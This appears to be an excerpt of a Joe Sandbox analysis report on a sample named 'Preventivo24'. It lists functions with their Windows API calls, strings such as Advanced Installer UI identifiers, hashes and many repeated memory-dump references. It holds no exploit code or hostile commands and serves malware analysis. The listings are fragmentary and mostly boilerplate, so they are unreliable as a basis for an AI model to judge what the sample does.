Instruction ID: 96d8c17d2fae11afd57d23a28c4217b5ffe4dd9841693ff45b2463e26ee78258
Opcode Fuzzy Hash: 2e8c13a1cbcba9289adbd6d44d2d7d8442f8cd75327e4513a731aac53fafb5ab
Instruction Fuzzy Hash: E542BE70D0025ACFDB28DF68C945BEDBBB1BF54314F1082ADE469A7681EB746A84DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00EB4E40 Relevance: 12.9, APIs: 5, Strings: 2, Instructions: 636windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00EB4F2B

Part of subcall function 0108AB55: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB60
Part of subcall function 0108AB55: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB9A

Part of subcall function 0108AB04: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB0E
Part of subcall function 0108AB04: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB41
Part of subcall function 0108AB04: WakeAllConditionVariable.KERNEL32(011CE924,?,?,00E8B517,011CF53C,01115440), ref: 0108AB4C

SendMessageW.USER32(?,0000104D,00000000,?), ref: 00EB541E
SendMessageW.USER32(?,0000102B,?,0000000F), ref: 00EB54CC
SendMessageW.USER32(?,00001003,00000001,?), ref: 00EB5573

Part of subcall function 00FB1C70: __cftof.LIBCMT ref: 00FB1CC0

SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 00EB5726

Strings

Icon, xrefs: 00EB5272
AiFeatIco, xrefs: 00EB51AB

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: MessageSend$ExclusiveLock$AcquireRelease$ConditionVariableWake__cftof
String ID: AiFeatIco$Icon
API String ID: 1739475930-1280411655
Opcode ID: 86b3f28d3c116dc3631dae5df535cea4066a502fc3d060c1b15b11d9885df2fe
Instruction ID: 94af6ae9f42ab4d61d29a03a393af8b48319d519750d405cab0e046276f61079
Opcode Fuzzy Hash: 86b3f28d3c116dc3631dae5df535cea4066a502fc3d060c1b15b11d9885df2fe
Instruction Fuzzy Hash: 91526B71A00658DFDB28DF68CD48BDEBBB1BF58304F1441A9E45AAB291DB706E84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00F99B50 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00F99E21
SendMessageW.USER32(?,00000443,00000000), ref: 00F99E95
MulDiv.KERNEL32(?,00000000), ref: 00F99ECC

Strings

Segoe UI, xrefs: 00F99EA3
NumberValidationTipTitle, xrefs: 00F99BEB
NumberValidationTipMsg, xrefs: 00F99CED

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: MessageSendWindow
String ID: NumberValidationTipMsg$NumberValidationTipTitle$Segoe UI
API String ID: 701072176-2319862951
Opcode ID: 6ef59019fc7d30453e02853d863a41203cb4eb8e574d3daa2edf55e9000547ca
Instruction ID: b8dfa706f743e4f8605bab9c6d6f849f18d112cc65d5174c016121328baa1dcc
Opcode Fuzzy Hash: 6ef59019fc7d30453e02853d863a41203cb4eb8e574d3daa2edf55e9000547ca
Instruction Fuzzy Hash: 04E19071A01619AFEB18DF24CC55BEDBBB2FF88300F104259E559A73C1DB746A85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010AC5E2 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 010AC7C6

Strings

1#QNAN, xrefs: 010AC6F5
1#SNAN, xrefs: 010AC6EE
1#INF, xrefs: 010AC718
1#IND, xrefs: 010AC6E7

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 2484f6fbabad26b42159054d5d40daf8caed5fe714c4bb68122d80cc4bbefabc
Instruction ID: c8b1089399b9c186189785d2459c5a540db5f59efe8a9a96edd7a3ef480257e8
Opcode Fuzzy Hash: 2484f6fbabad26b42159054d5d40daf8caed5fe714c4bb68122d80cc4bbefabc
Instruction Fuzzy Hash: 47D21A71E082298FDB65CEA8DD407EEB7B5EB48304F5541EAD58DE7240EB34AE818F41

Uniqueness

Uniqueness Score: -1.00%

Function 00FF2400 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 463COMMON

Download Yara Rule

APIs

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

GetLogicalDriveStringsW.KERNEL32(00000064,?), ref: 00FF2640
GetDriveTypeW.KERNEL32(?), ref: 00FF265A
Wow64DisableWow64FsRedirection.KERNEL32(00000000,00000000), ref: 00FF26F5
Wow64RevertWow64FsRedirection.KERNEL32(00000000,00000000), ref: 00FF2996

Strings

]%!, xrefs: 00FF25D8

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Wow64$DriveRedirection$DisableHeapLogicalProcessRevertStringsType
String ID: ]%!
API String ID: 4157823300-1069524040
Opcode ID: ae6b339a6e934025ad43d5cf4671a0fa58d94da2e57b54dd11bc50e226f2dc53
Instruction ID: 382c9dd5f62eaed3b697aeaf310cec72d2e87145c9bacd9a3e149e5f23e60839
Opcode Fuzzy Hash: ae6b339a6e934025ad43d5cf4671a0fa58d94da2e57b54dd11bc50e226f2dc53
Instruction Fuzzy Hash: 6C02DF31A0025D8FDB24DF28CC94BADB7B5AF08310F1485E9E91AA7391DB749E85DF90

Uniqueness

Uniqueness Score: -1.00%

Function 01008B30 Relevance: 9.2, APIs: 6, Instructions: 203fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000,-00000010,?,B5580983,?,?,00000000), ref: 01008BFC
FindNextFileW.KERNEL32(?,00000000,?,00000000), ref: 01008C17

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: 0e9633deefff460ac83f4f4079df102f10fc198cbb489f7d9257048648a6ca1c
Instruction ID: 5d20cf53a137a1a8f851c2465ad76b488feb66f8dab64a85219c0a32c2fc7a14
Opcode Fuzzy Hash: 0e9633deefff460ac83f4f4079df102f10fc198cbb489f7d9257048648a6ca1c
Instruction Fuzzy Hash: F4818C71900648DFEB15DFA8C948AEDBBF4FF08324F148699E829A72C1DB759A05CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0108A1CE Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,0108A0EA,00000000,?,0108A282,?,?,?,?), ref: 0108A1D0
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,?,?,?), ref: 0108A1F7
HeapAlloc.KERNEL32(00000000,?,?,?,?), ref: 0108A1FE
InitializeSListHead.KERNEL32(00000000,?,?,?,?), ref: 0108A20B
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?), ref: 0108A220
HeapFree.KERNEL32(00000000,?,?,?,?), ref: 0108A227

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: fcc4e039517b9a4cdb53e067f9f1a65a60e7a2f26668917fae4d3c7bcc722dbb
Instruction ID: 3ca19eaf22c684fa73bb127c5e31a7be1f0cef70e76e207d552b1271b124ca56
Opcode Fuzzy Hash: fcc4e039517b9a4cdb53e067f9f1a65a60e7a2f26668917fae4d3c7bcc722dbb
Instruction Fuzzy Hash: 00F0AF75345251DBDB75AF2CA908B16BBE8EB85A12F040439F9E6C3388DA70C0818761

Uniqueness

Uniqueness Score: -1.00%

Function 0100CED0 Relevance: 7.9, APIs: 5, Instructions: 368fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,B5580983,?,00FFE190,00000000,?,?,?,00000000,01104AE5), ref: 0100CF2D
SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000), ref: 0100CF62
ReadFile.KERNEL32(00000000,00000000,0000000A,?,00000000), ref: 0100CF84
ReadFile.KERNEL32(00000000,?,00000005,?,00000000), ref: 0100D06D
CloseHandle.KERNEL32(00000000), ref: 0100D17D

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: File$Read$CloseCreateHandlePointer
String ID:
API String ID: 3856724686-0
Opcode ID: 25a4778765a8949bbae0e3ae439115bafba3d41a53f13c0fc4f69123dc7486d1
Instruction ID: da2610c5354c5ea31c6a41979caa544869d9523fd9099a7ebc7e0042aa723384
Opcode Fuzzy Hash: 25a4778765a8949bbae0e3ae439115bafba3d41a53f13c0fc4f69123dc7486d1
Instruction Fuzzy Hash: 09C1D235A00209EBEB1ACBA8C845BBEBBF5FF48720F14419DE955A73C1DB359901CB60

Uniqueness

Uniqueness Score: -1.00%

Function 010A29F3 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 010A2A80

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 6bf30f727968c550dafa84dae64e81f95c503f9883482f211eb6c0125f197d34
Instruction ID: 0e23934d893cab7b9ec418e0dee85a9e86885bbca35aed09b16f99efb10211c1
Opcode Fuzzy Hash: 6bf30f727968c550dafa84dae64e81f95c503f9883482f211eb6c0125f197d34
Instruction Fuzzy Hash: 04B1593290424A9FDB15CFECC8917FEBBE5EF55350F5482BAD984AB242D235D901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FF3790 Relevance: 6.2, APIs: 4, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b625849fc1911a65a1370238ab67aca9d4af5f2889d2e42051fdec920abe31c5
Instruction ID: e3992aa8cd5caae019d20bae3f5161f0df22e6a32bdedc236cc2809d6eab0317
Opcode Fuzzy Hash: b625849fc1911a65a1370238ab67aca9d4af5f2889d2e42051fdec920abe31c5
Instruction Fuzzy Hash: A391BE71901218CFDB64DF28CC49BA9BBB5AF08320F1482D9E928A73D1DB749E84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00FBCDD0 Relevance: 6.2, APIs: 4, Instructions: 163fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,00000000,00000000), ref: 00FBCE62
FindFirstFileW.KERNEL32(?,00000000,0000002A), ref: 00FBCF06
FindClose.KERNEL32(00000000), ref: 00FBCF30
FindClose.KERNEL32(00000000), ref: 00FBCF89

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 48d61fabf574e6864abdcb2f5d760d31afc284bfea1651b897d788d5c677455a
Instruction ID: b3e754bf61e7437ee3733a3ccc596065c68bbe3f7f34f6ef7a68f2bbf17d9331
Opcode Fuzzy Hash: 48d61fabf574e6864abdcb2f5d760d31afc284bfea1651b897d788d5c677455a
Instruction Fuzzy Hash: B651E135900209DBDB24DF66C9087FEB7B5FF55324F14829AE825A7280E7309A44DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EAB090 Relevance: 5.7, Strings: 4, Instructions: 704COMMON

Download Yara Rule

Strings

AI_NO_BORDER_NORMAL, xrefs: 00EAB185
AI_CONTROL_VISUAL_STYLE_EX, xrefs: 00EAB555
AI_CONTROL_VISUAL_STYLE, xrefs: 00EAB0EA
AI_NO_BORDER_HOVER, xrefs: 00EAB23A

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID: AI_CONTROL_VISUAL_STYLE$AI_CONTROL_VISUAL_STYLE_EX$AI_NO_BORDER_HOVER$AI_NO_BORDER_NORMAL
API String ID: 0-932585912
Opcode ID: 254b09410462edd77175aa8b25239f7cae6a12ee0ee0dc0ee14304929787cae0
Instruction ID: 7e1ad17fef91037c74ae7fc6dd073d9e47c5c3d9ce12513e4f7f21775d7303ce
Opcode Fuzzy Hash: 254b09410462edd77175aa8b25239f7cae6a12ee0ee0dc0ee14304929787cae0
Instruction Fuzzy Hash: EC42F471D002288BDB18DF68CC547AEB7F1FF8A304F148259E495BB392D778A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EB6600 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 288windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000102B,00000000,?), ref: 00EB672B
SendMessageW.USER32(?,0000102B,0000009B,-00000002), ref: 00EB6968

Strings

X, xrefs: 00EB661F, 00EB69B1

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: MessageSend
String ID: X
API String ID: 3850602802-298166547
Opcode ID: 935c33cb0906d7cdf3f562614db551556c2a040513a5141d839890bfa2bdcd91
Instruction ID: 0353d4f9832d168be2ff78c81bc8a70e73cb14e959667e696f1c6109ff0b2df0
Opcode Fuzzy Hash: 935c33cb0906d7cdf3f562614db551556c2a040513a5141d839890bfa2bdcd91
Instruction Fuzzy Hash: 9FC1AF71A002068FDF18CF64C995AEEBBF5FF48304F18917AD859AF295D738A941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FF3C10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 195fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,00000000,00000010), ref: 00FF3CCC
FindClose.KERNEL32(00000000), ref: 00FF3E4F

Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

Strings

%d.%d.%d.%d, xrefs: 00FF3DC8

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

